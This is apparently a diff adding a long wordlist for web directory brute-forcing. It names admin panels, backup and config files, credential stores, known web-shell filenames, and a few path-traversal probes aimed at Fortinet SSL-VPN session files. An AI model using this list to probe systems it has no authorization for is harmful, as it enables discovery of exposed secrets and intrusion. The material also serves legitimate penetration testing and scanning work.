+phpMyAdmin-2.6.0/
+phpMyAdmin-2.6.1-pl1/
+phpMyAdmin-2.6.1-pl2/
+phpMyAdmin-2.6.1-pl3/
+phpMyAdmin-2.6.1-rc1/
+phpMyAdmin-2.6.1-rc2/
+phpMyAdmin-2.6.1/
+phpMyAdmin-2.6.2-beta1/
+phpMyAdmin-2.6.2-pl1/
+phpMyAdmin-2.6.2-rc1/
+phpMyAdmin-2.6.2/
+phpMyAdmin-2.6.3-pl1/
+phpMyAdmin-2.6.3-rc1/
+phpMyAdmin-2.6.3/
+phpMyAdmin-2.6.4-pl1/
+phpMyAdmin-2.6.4-pl2/
+phpMyAdmin-2.6.4-pl3/
+phpMyAdmin-2.6.4-pl4/
+phpMyAdmin-2.6.4-rc1/
+phpMyAdmin-2.6.4/
+phpMyAdmin-2.7.0-beta1/
+phpMyAdmin-2.7.0-pl1/
+phpMyAdmin-2.7.0-pl2/
+phpMyAdmin-2.7.0-rc1/
+phpMyAdmin-2.7.0/
+phpMyAdmin-2.8.0-beta1/
+phpMyAdmin-2.8.0-rc1/
+phpMyAdmin-2.8.0-rc2/
+phpMyAdmin-2.8.0.1/
+phpMyAdmin-2.8.0.2/
+phpMyAdmin-2.8.0.3/
+phpMyAdmin-2.8.0.4/
+phpMyAdmin-2.8.0/
+phpMyAdmin-2.8.1-rc1/
+phpMyAdmin-2.8.1/
+phpMyAdmin-2.8.2/
+phpMyAdmin-2/
+phpMyAdmin-3.0.0/
+phpMyAdmin-3.0.1/
+phpMyAdmin-3.1.0/
+phpMyAdmin-3.1.1/
+phpMyAdmin-3.1.2/
+phpMyAdmin-3.1.3/
+phpMyAdmin-3.1.4/
+phpMyAdmin-3.1.5/
+phpMyAdmin-3.2.0/
+phpMyAdmin-3.2.1/
+phpMyAdmin-3.2.2/
+phpMyAdmin-3.2.3/
+phpMyAdmin-3.2.4/
+phpMyAdmin-3.2.5/
+phpMyAdmin-3.3.0/
+phpMyAdmin-3.3.1/
+phpMyAdmin-3.3.2-rc1/
+phpMyAdmin-3.3.2/
+phpMyAdmin-3.3.3-rc1/
+phpMyAdmin-3.3.3/
+phpMyAdmin-3.3.4-rc1/
+phpMyAdmin-3.3.4/
+phpMyAdmin-3/
+phpMyAdmin-4/
+phpmyadmin-old/index.php
+phpMyAdmin.old/index.php
+phpMyAdmin/
+phpMyadmin/
+phpmyAdmin/
+phpmyadmin/
+phpMyAdmin/index.php
+phpmyadmin/index.php
+phpMyAdmin/phpMyAdmin/index.php
+phpmyadmin/phpmyadmin/index.php
+phpMyAdmin/scripts/setup.php
+phpmyadmin/scripts/setup.php
+phpMyAdmin0/
+phpmyadmin0/
+phpmyadmin0/index.php
+phpMyAdmin1/
+phpmyadmin1/
+phpmyadmin1/index.php
+phpMyAdmin2/
+phpmyadmin2/
+phpmyadmin2/index.php
+phpmyadmin2011/
+phpmyadmin2012/
+phpmyadmin2013/
+phpmyadmin2014/
+phpmyadmin2015/
+phpmyadmin2016/
+phpmyadmin2017/
+phpmyadmin2018/
+phpMyAdmin3/
+phpmyadmin3/
+phpMyAdmin4/
+phpmyadmin4/
+phpMyadmin_bak/index.php
+phpMyAdminBackup/
+phpMyAdminold/index.php
+phpMyAds/
+phppgadmin
+phpPgAdmin/
+phppgadmin/
+phppma/
+phpRedisAdmin/
+phpredmin/
+phproad/
+phpsecinfo/
+phpspec.yml
+phpSQLiteAdmin/
+phpstudy.php
+phpsysinfo/
+phptest.php
+phpThumb.php
+phpThumb/
+phpunit.phar
+phpunit.xml
+phpunit.xml.dist
+phymyadmin/
+pi.php
+pi.php5
+pids
+pinfo.php
+pip-delete-this-directory.txt
+pip-log.txt
+piwigo/
+piwigo/extensions/UserCollections/template/ZeroClipboard.swf
+pkg/
+placeholder_one
+placeholder_two
+planning/cfg
+planning/docs
+planning/src
+platz_login/
+play-cache
+play-stash
+player.swf
+playground
+playground.xcworkspace
+plugin.xml
+plugins
+plugins.log
+plugins/
+plugins/editors/fckeditor
+plugins/fckeditor
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
+plugins/tiny_mce/
+plugins/tinymce/
+plugins/upload.php
+plugins/web.config
+plupload
+pm_to_blib
+pma-old/index.php
+PMA/
+pma/
+PMA/index.php
+pma/index.php
+pma/scripts/setup.php
+PMA2/index.php
+PMA2005/
+pma2005/
+PMA2009/
+pma2009/
+PMA2011/
+pma2011/
+PMA2012/
+pma2012/
+PMA2013/
+pma2013/
+PMA2014/
+pma2014/
+PMA2015/
+pma2015/
+PMA2016/
+pma2016/
+PMA2017/
+pma2017/
+PMA2018/
+pma2018/
+pma4/
+pmadmin/
+pmamy/index.php
+pmamy2/index.php
+pmd/index.php
+pmyadmin/
+pom.xml
+pom.xml.asc
+pom.xml.next
+pom.xml.releaseBackup
+pom.xml.tag
+pom.xml.versionsBackup
+portal/
+postgresql.conf
+power_user/
+powershell/
+pprof/
+printenv
+printenv.tmp
+priv8.php
+private.key
+private.mdb
+private.sqlite
+privatekey.key
+processlogin
+processlogin.php
+Procfile
+Procfile.dev
+Procfile.offline
+product.json
+productcockpit/
+production.log
+profiles
+profiles.xml
+program/
+proguard/
+project-admins/
+project.fragment.lock.json
+project.lock.json
+project.xml
+project/project
+project/target
+prometheus
+prometheus/
+prometheus/targets
+propel.ini
+propel.json
+protected/data/
+protected/runtime/
+providers.json
+proxy.pac
+proxy.stream?origin=https://google.com
+proxy/
+proxy_config.json
+prv/
+PSUser/
+public
+public..
+public/
+public/hot
+public/storage
+public/system
+public_html.zip
+public_html/
+publication_list.xml
+publish/
+PublishScripts/
+pubspec.lock
+puppet/
+pureadmin/
+putty.reg
+pw.txt
+pwd.db
+pws.txt
+py-compile
+qa/
+qq.php
+qql/
+qsd-php-backdoor.php
+query.log
+QuickLook/
+quikstore.cfg
+r.php
+r00t.php
+r57.php
+r57eng.php
+r57shell.php
+r58.php
+r99.php
+rabbitmq/
+radius/
+radmind-1/
+radmind/
+rails/info/properties
+Rakefile
+raygun/
+rcf/
+rcjakar/
+rcjakar/admin/login.php
+rcLogin/
+rdoc/
+reach/sip.svc
+Read
+Read%20Me.txt
+read.me
+Read_Me.txt
+README
+ReadMe
+Readme
+readme
+README.htm
+README.HTML
+README.html
+ReadMe.html
+Readme.html
+readme.html
+README.MD
+README.md
+ReadMe.md
+Readme.md
+readme.md
+README.mkd
+readme.mkd
+readme.php
+README.TXT
+README.txt
+ReadMe.txt
+Readme.txt
+readme.txt
+recentservers.xml
+redis/
+redmine/
+refresh
+refresh.json
+register.php
+registration/
+registry/
+rel/example_project
+release.properties
+RELEASE_NOTES.txt
+relogin
+relogin.htm
+relogin.html
+relogin.php
+remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
+remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+repo/
+request.log
+requesthandler/
+requesthandlerext/
+requirements.txt
+rerun.txt
+reseller
+resources.xml
+resources/
+resources/.arch-internal-preview.css
+resources/fckeditor
+resources/sass/.sass-cache/
+resources/tmp/
+rest-api/
+rest-auth/
+rest/
+rest/v1
+rest/v3/doc
+restart
+restart.json
+restore.php
+restricted
+resume
+resume.json
+revision.inc
+revision.txt
+rgs/
+rgsclients/
+robot.txt
+robots.txt
+robots.txt.dist
+root/
+RootCA.crt
+roundcube/index.php
+rpc/
+rpcwithcert/
+rsconnect/
+rst.php
+rudder/
+run.sh
+run.zip
+RushSite.xml
+s.php
+sa.php
+sa2.php
+sales.csv
+sales.log
+sales.sql
+sales.sql.gz
+sales.txt
+sales.xls
+salesforce.schema
+saltstack/
+sample.txt
+sample.txt~
+Saved/
+sbt/
+scalyr/
+scheduledtasks
+scheduler/
+schema.sql
+schema.yml
+script.zip
+script/
+script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+scripts
+scripts.zip
+scripts/
+scripts/ckeditor/ckfinder/core/connector/asp/connector.asp
+scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
+scripts/ckeditor/ckfinder/core/connector/php/connector.php
+scripts/setup.php
+sdb.php
+sdist/
+searchreplacedb2.php
+searchreplacedb2cli.php
+secret
+Secret/
+secret/
+secrets.env
+secrets/
+secring.bak
+secring.pgp
+secring.skr
+secure/
+security/
+selenium/
+sendgrid.env
+sensu/
+sentemails.log
+sentry/
+serv-u.ini
+Server
+server-info
+server-status
+server-status/
+server.cert
+server.cfg
+server.config.yaml
+server.js
+server.key
+server.log
+server.ovpn
+Server.php
+server.pid
+server.xml
+Server/
+server/config.json
+server/server.js
+server_admin_small/
+server_stats
+ServerAdministrator/
+ServerList.cfg
+ServerList.xml
+servers.xml
+serverStatus.log
+service-registry/instance-status
+service-registry/instance-status.json
+service.asmx
+service.yaml
+serviceaccount.crt
+ServiceFabricBackup/
+services
+services/
+services/config/databases.yml
+servlet/
+servlet/%C0%AE%C0%AE%C0%AF
+servlet/DMSDump
+servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/SnoopServlet
+servlet/Spy
+session/
+sessions
+sessions/
+settings.php
+settings.php.bak
+settings.php.dist
+settings.php.old
+settings.php.save
+settings.php.swp
+settings.php.txt
+settings.php~
+settings.py
+settings.xml
+settings/
+Settings/ui.plist
+setup
+setup.data
+setup.log
+setup.php
+setup.sql
+setup/
+sftp-config.json
+Sh3ll.php
+sheep.php
+shell.php
+shell.sh
+shell/
+shellz.php
+shopdb/
+show
+showcode.asp
+showlogin/
+shutdown
+sidekiq
+sidekiq_monitor
+sign-in
+sign-in/
+sign_in
+sign_in/
+signin
+signin.php
+signin/
+signup.action
+simple-backdoor.php
+simpleLogin/
+sip/
+site
+site.rar
+site.sql
+site.tar
+site.tar.bz2
+site.tar.gz
+site.txt
+site.zip
+site/
+site/common.xml
+site_admin
+siteadmin
+siteadmin.php
+siteadmin/
+siteadmin/index.php
+siteadmin/login.html
+siteadmin/login.php
+sitemanager.xml
+sites.ini
+sites.xml
+sites/all/libraries/README.txt
+sites/all/modules/README.txt
+sites/all/themes/README.txt
+sites/default/private/files/backup_migrate/scheduled/test.txt
+sites/example.sites.php
+sites/README.txt
+sized/
+slapd.conf
+smblogin/
+snoop.jsp
+snort/
+soap/
+soap/servlet/soaprouter
+soap/servlet/Spy
+soapdocs/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+soapserver/
+sonar/
+sonarcube/
+sonarqube/
+source
+source.php
+source.zip
+source/
+source/inspector.html
+source_gen
+source_gen.caches
+SourceArt/
+spamlog.log
+spec/
+spec/examples.txt
+spec/lib/database.yml
+spec/lib/settings.local.yml
+spec/reports/
+spec/tmp
+splunk/
+spwd.db
+spy.aspx
+sql-admin/
+sql.inc
+sql.php
+sql.sql
+sql.tar
+sql.tar.bz2
+sql.tar.gz
+sql.tgz
+sql.txt
+sql.zip
+sql/
+sql/index.php
+sql/myadmin/
+sql/php-myadmin/
+sql/phpmanager/
+sql/phpmy-admin/
+sql/phpMyAdmin/
+sql/phpMyAdmin2/
+sql/phpmyadmin2/
+sql/sql-admin/
+sql/sql/
+sql/sqladmin/
+sql/sqlweb/
+sql/webadmin/
+sql/webdb/
+sql/websql/
+sql_dumps
+sql_error.log
+sqladm
+sqladmin
+sqladmin/
+sqlbuddy
+sqlbuddy/
+sqlbuddy/login.php
+sqldump.sql
+sqlmanager/
+sqlmigrate.php
+sqlnet.log
+sqlweb/
+SQLyogTunnel.php
+SqueakDebug.log
+squid-reports/
+squid/
+squid3_log/
+src/
+src/app.js
+src/index.js
+src/server.js
+srv/
+srv_gen/
+ss_vms_admin_sm/
+ssh/
+sshadmin/
+ssl/
+st.php
+stackstorm/
+stacktrace.log
+staff/
+stage_create_service.sh
+stage_create_service_dev.sh
+stage_create_service_prod.sh
+stage_deploy.sh
+stage_deploy_dev.sh
+stage_deploy_prod.sh
+stamp-h1
+staradmin/
+start.html
+start.sh
+startServer.log
+startup.cfg
+startup.sh
+stas/
+stash/
+stat/
+static..
+static/dump.sql
+statistics
+statistics/
+stats
+stats/
+statsd/
+status.php
+status.xsl
+status/
+status?full=true
+statusicon/
+storage/
+storage/logs/laravel.log
+store.tgz
+StreamingStatistics
+stronghold-info
+stronghold-status
+stssys.htm
+StyleCopReport.xml
+stylesheets/bundles
+sub-login/
+subversion/
+sugarcrm.log
+supe.php
+super
+Super-Admin/
+super.php
+super1
+super1/
+super_inde.php
+super_index
+super_logi.php
+super_login
+superma.php
+superman
+superman/
+supermanage.php
+supermanager
+superuse.php
+superuser
+superuser.php
+superuser/
+supervise/
+supervise/Logi.php
+supervise/Login
+supervisor/
+supervisord/
+support/
+support_login/
+surgemail/
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf
+suspended.page
+svn.revision
+SVN/
+svn/
+svn/wc.db
+swagger
+swagger-resources
+swagger-ui
+swagger-ui.html
+swagger.json
+swagger.yaml
+swagger/index.html
+swagger/swagger-ui.htm
+swagger/swagger-ui.html
+swagger/ui
+swagger/v1/swagger.json
+swaggerui
+swfobject.js
+swfupload
+swfupload.swf
+sxd/
+sxd/backup/
+sxdpro/
+Sym.php
+sYm.php
+sym/
+sym/root/home/
+symfony/
+symfony/apps/frontend/config/routing.yml
+symfony/apps/frontend/config/settings.yml
+symfony/config/databases.yml
+Symlink.php
+Symlink.pl
+symphony/
+symphony/apps/frontend/config/app.yml
+symphony/apps/frontend/config/databases.yml
+symphony/config/app.yml
+symphony/config/databases.yml
+syncNode.log
+sypex.php
+sypexdumper.php
+SypexDumper_2011/
+sys-admin/
+sys/pprof
+sysadm
+sysadm.php
+sysadm/
+sysadmin
+sysadmin.php
+SysAdmin/
+sysadmin/
+SysAdmin2/
+sysadmins
+sysadmins/
+sysbackup
+sysinfo.txt
+syslog/
+system-administration/
+system.log
+system.zip
+system/
+system/cache/
+system/cron/cron.txt
+system/error.txt
+system/expressionengine/config/config.php
+system/expressionengine/config/database.php
+system/log/
+system/logs/
+system/storage/
+system_administration/
+SystemErr.log
+SystemOut.log
+t00.php
+tags
+tar
+tar.bz2
+tar.gz
+tar.php
+target
+target/
+tasks/
+tconn.conf
+team/
+technico.txt
+telephone
+telphin.log
+temp-testng-customsuite.xml
+temp.php
+temp.sql
+TEMP/
+temp/
+template/
+templates/
+templates/beez/index.php
+templates/beez3/
+templates/index.html
+templates/ja-helio-farsi/index.php
+templates/protostar/
+templates/rhuk_milkyway/index.php
+templates/system/
+templates_c/
+teraform/
+test
+test-build/
+test-driver
+test-output/
+test-report/
+test-result
+test.asp
+test.aspx
+test.chm
+test.htm
+test.html
+test.jsp
+test.mdb
+test.php
+test.sqlite
+test.txt
+test/
+test/php/test.html
+test/reports
+test/ssi/test.shtml
+test/tmp/
+test/version_tmp/
+test0.php
+test1
+test1.php
+test123.php
+test2
+test2.php
+test3.php
+test4.php
+test5.php
+test6.php
+test7.php
+test8.php
+test9.php
+test_
+test_gen
+test_gen.caches
+test_ip.php
+testfile.php
+Testing
+testproxy.php
+TestResult.xml
+tests
+tests/
+tests/phpunit_report.xml
+texinfo.tex
+textpattern/
+themes
+themes/
+themes/default/htdocs/flash/ZeroClipboard.swf
+Thorfile
+threaddump
+Thumbs.db
+thumbs.db
+thumbs/
+tikiwiki
+timeline.xctimeline
+tiny_mce/
+tiny_mce/plugins/filemanager/examples.html
+tiny_mce/plugins/imagemanager/pages/im/index.html
+tinyfilemanager-2.0.1/
+tinyfilemanager-2.0.2/
+tinyfilemanager-2.2.0/
+tinyfilemanager-2.3/
+tinyfilemanager.php
+tinyfilemanager/
+tinymce
+tinymce/
+TMP
+tmp
+tmp.php
+tmp/
+tmp/2.php
+tmp/access.log
+tmp/access_log
+tmp/admin.php
+tmp/cache/models/
+tmp/cache/persistent/
+tmp/cache/views/
+tmp/cgi.pl
+tmp/Cgishell.pl
+tmp/changeall.php
+tmp/cpn.php
+tmp/d.php
+tmp/d0maine.php
+tmp/domaine.php
+tmp/domaine.pl
+tmp/dz.php
+tmp/dz1.php
+tmp/error.log
+tmp/error_log
+tmp/index.php
+tmp/killer.php
+tmp/L3b.php
+tmp/madspotshell.php
+tmp/nanoc/
+tmp/priv8.php
+tmp/root.php
+tmp/sessions/
+tmp/sql.php
+tmp/Sym.php
+tmp/tests/
+tmp/up.php
+tmp/upload.php
+tmp/uploads.php
+tmp/user.php
+tmp/vaga.php
+tmp/whmcs.php
+tmp/xd.php
+TODO
+token.json
+tokenlite.zip
+tomcat-docs/appdev/sample/web/hello.jsp
+tomcat/axis/
+tools
+tools.php
+tools/
+tools/_backups/
+tools/phpMyAdmin/index.php
+trace
+Trace.axd
+Trace.axd::$DATA
+trace.json
+translate.sql
+transmission/web/
+tresearch/
+tresearch/happyaxis.jsp
+tripwire/
+trivia/
+tsconfig.json
+tst
+twitter/.env
+txt/
+typings/
+typo3
+typo3/
+typo3/phpmyadmin/
+typo3/phpmyadmin/index.php
+typo3/phpmyadmin/scripts/setup.php
+typo3_src
+typo3conf/AdditionalConfiguration.php
+typo3conf/temp_fieldInfo.php
+typo3temp/
+uber/
+uber/phpMemcachedAdmin/
+uber/phpMyAdmin/
+uber/phpMyAdminBackup/
+ucwa/
+uddi
+uddiexplorer
+ui
+ui/
+unattend.txt
+unifiedmessaging/
+up.php
+update
+update.php
+UPDATE.txt
+updates
+upfile.php
+UPGRADE
+upgrade.php
+upgrade.readme
+UPGRADE.txt
+UpgradeLog.XML
+upguard/
+upl.php
+Upload
+upload
+upload.asp
+upload.aspx
+upload.cfm
+upload.htm
+upload.html
+upload.php
+upload.php3
+upload.shtm
+upload.zip
+upload/
+upload/1.php
+upload/2.php
+upload/b_user.csv
+upload/b_user.xls
+upload/loginIxje.php
+upload/test.php
+upload/test.txt
+upload/upload.php
+upload2.php
+upload_backup/
+upload_file.php
+uploaded/
+uploader.php
+uploader/
+uploadfile.asp
+uploadfile.php
+uploadfiles.php
+uploadify.php
+uploadify/
+uploads.php
+uploads.zip
+uploads/
+uploads/dump.sql
+upstream_conf
+ur-admin
+ur-admin.php
+ur-admin/
+usage/
+user
+user.asp
+user.html
+user.php
+user.txt
+user/
+user/admin
+user/admin.php
+user_guide
+user_guide_src/build/
+user_guide_src/cilexer/build/
+user_guide_src/cilexer/dist/
+user_guide_src/cilexer/pycilexer.egg-info/
+user_uploads
+useradmin
+useradmin/
+userdb
+UserFile
+UserFiles
+userfiles
+userlogin
+userlogin.php
+UserLogin/
+usernames.txt
+users
+users.csv
+users.db
+users.ini
+users.json
+users.log
+users.mdb
+users.php
+users.sql
+users.sql.gz
+users.sqlite
+users.txt
+users.xls
+users/
+users/admin
+users/admin.php
+usr/
+usuario/
+usuarios/
+usuarios/login.php
+utility_login/
+uvpanel/
+uwsgi.ini
+v1
+v1.0
+v1.1
+v1.zip
+v1/
+v1/graphiql
+v1/graphql
+v1/playground
+v1/public/yql
+v1/test/js/console.html
+v1/test/js/console_ajax.js
+v2
+v2.0
+v2.zip
+v2/
+v2/_catalog
+v2/graphiql
+v2/graphql
+v2/keys/?recursive=true
+v2/playground
+v3
+v3/graphiql
+v3/graphql
+v3/playground
+vadmind/
+vagrant-spec.config.rb
+vagrant/
+Vagrantfile
+Vagrantfile.backup
+validator.php
+var/
+var/backups/
+var/bootstrap.php.cache
+var/cache/
+var/log
+var/log/
+var/log/authorizenet.log
+var/log/exception.log
+var/log/librepag.log
+var/log/old
+var/log/payment.log
+var/log/payment_authorizenet.log
+var/log/payment_paypal_express.log
+var/logs/
+var/package/
+var/sessions/
+variant/
+vault/
+vb.rar
+vb.sql
+vb.zip
+vendor/
+vendor/assets/bower_components
+vendor/bundle
+vendor/composer/installed.json
+vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+vendors/
+venv.bak/
+venv/
+version
+VERSION.txt
+version.txt
+version/
+video-js.swf
+view-source
+view.php
+views
+vignettes/
+violations/
+vm
+vmailadmin/
+vorod
+vorod.php
+vorod/
+vorud
+vorud.php
+vorud/
+vpn/
+vqmod/checked.cache
+vqmod/logs/
+vqmod/mods.cache
+vqmod/vqcache/
+vrot.php
+vtiger/
+vtigercrm/
+vtund.conf
+w.php
+wallet.dat
+wallet.json
+war/gwt_bree/
+war/WEB-INF/classes/
+war/WEB-INF/deploy/
+wc.php
+wcx_ftp.ini
+web-app/plugins
+web-app/WEB-INF/classes
+web-console/
+web-console/Invoker
+web-console/ServerInfo.jsp
+web-console/status?full=true
+WEB-INF./
+WEB-INF./web.xml
+WEB-INF/
+WEB-INF/config.xml
+WEB-INF/lib/_wl_cls_gen.jar
+WEB-INF/web.xml
+web-variables.env
+web.7z
+web.config
+web.config.bak
+web.config.bakup
+web.config.old
+web.config.temp
+web.config.tmp
+web.config.txt
+web.config::$DATA
+web.Debug.config
+web.rar
+web.Release.config
+web.sql
+web.tar
+web.tar.bz2
+web.tar.gz
+web.tgz
+web.xml
+web.zip
+web/
+web/bundles/
+web/phpMyAdmin/
+web/phpMyAdmin/index.php
+web/phpMyAdmin/scripts/setup.php
+web/scripts/setup.php
+web/uploads/
+webadmin
+webadmin.html
+webadmin.php
+webadmin/
+webadmin/admin.html
+webadmin/admin.php
+webadmin/index.html
+webadmin/index.php
+webadmin/login.html
+webadmin/login.php
+webalizer
+webapp/wm/runtime.jsp
+webdav.password
+webdav/
+webdav/index.html
+webdav/servlet/webdav/
+webdb/
+webgrind
+weblogs
+webmail/
+webmail/src/configtest.php
+webmaster
+webmaster.php
+webmaster/
+webmin/
+webpack.config.js
+webpack.mix.js
+website.git
+website.tar
+website.tar.bz2
+website.tar.gz
+website.zip
+websql/
+webstat
+webstat/
+webstats
+webstats.html
+webstats/
+webticket/
+webticket/webticketservice.svc
+weixiao.php
+well-known.zip
+wenzhang
+wget-log
+wheels/
+whmcs.php
+whmcs/
+whmcs/downloads/dz.php
+wiki/
+winscp.ini
+WinSCP.ini
+wizmysqladmin/
+wordpress.tar
+wordpress.tar.bz2
+wordpress.tar.gz
+wordpress.zip
+wordpress/
+wordpress/wp-login.php
+workspace.xml
+workspace/uploads/
+wp-admin/
+wp-admin/c99.php
+wp-admin/install.php
+wp-admin/setup-config.php
+wp-app.log
+wp-cli.yml
+wp-config-sample.php
+wp-config.inc
+wp-config.old
+wp-config.php
+wp-config.php.bak
+wp-config.php.dist
+wp-config.php.inc
+wp-config.php.old
+wp-config.php.save
+wp-config.php.swp
+wp-config.php.txt
+wp-config.php.zip
+wp-config.php~
+wp-content/
+wp-content/backup-db/
+wp-content/backups/
+wp-content/blogs.dir/
+wp-content/cache/
+wp-content/debug.log
+wp-content/mu-plugins/
+wp-content/plugins/adminer/inc/editor/index.php
+wp-content/plugins/count-per-day/js/yc/d00.php
+wp-content/plugins/hello.php
+wp-content/upgrade/
+wp-content/uploads/
+wp-content/uploads/dump.sql
+wp-content/uploads/file-manager/log.txt
+wp-includes/
+wp-includes/rss-functions.php
+wp-json/
+wp-json/wp/v2/users/
+wp-login.php
+wp-login/
+wp-register.php
+wp.php
+wp.rar/
+wp.zip
+wp/
+wp/wp-login.php
+wpad.dat
+ws.php
+WS_FTP.ini
+ws_ftp.ini
+WS_FTP.INI
+WS_FTP.LOG
+WS_FTP/
+WS_FTP/Sites/ws_ftp.ini
+wsadmin.traceout
+wsadmin.valout
+wsadminListener.out
+wshell.php
+wsman
+WSO.php
+wso.php
+wso2.5.1.php
+wso2.php
+wssgs/
+wssgs/happyaxis.jsp
+wstats
+wuwu11.php
+wvdial.conf
+www-error.log
+www-test/
+www.rar
+www.sql
+www.tar
+www.tar.bz2
+www.tar.gz
+www.tgz
+www.zip
+www/phpMyAdmin/index.php
+wwwboard/
+wwwboard/passwd.txt
+wwwlog
+wwwroot.7z
+wwwroot.rar
+wwwroot.sql
+wwwroot.tar
+wwwroot.tar.bz2
+wwwroot.tar.gz
+wwwroot.tgz
+wwwroot.zip
+wwwstat
+wwwstats.htm
+x.php
+xampp/
+xampp/phpmyadmin/
+xampp/phpmyadmin/index.php
+xampp/phpmyadmin/scripts/setup.php
+xcuserdata/
+xd.php
+xferlog
+xiaoma.php
+xlogin/
+xls/
+xml/
+xml/_common.xml
+xml/common.xml
+xmlrpc.php
+xmlrpc_server.php
+xphperrors.log
+xphpMyAdmin/
+xprober.php
+xshell.php
+xsl/
+xsl/_common.xsl
+xsl/common.xsl
+xslt/
+xsql/
+xsql/lib/XSQLConfig.xml
+xw.php
+xw1.php
+xx.php
+yaml.log
+yaml_cron.log
+yarn-debug.log
+yarn-error.log
+yarn.lock
+ylwrap
+yonetici
+yonetici.html
+yonetici.php
+yonetim
+yonetim.html
+yonetim.php
+yum.log
+zabbix/
+zebra.conf
+zehir.php
+zeroclipboard.swf
+zf_backend.php
+zimbra/
+zipkin/
+zone-h.php
+~/
+~admin/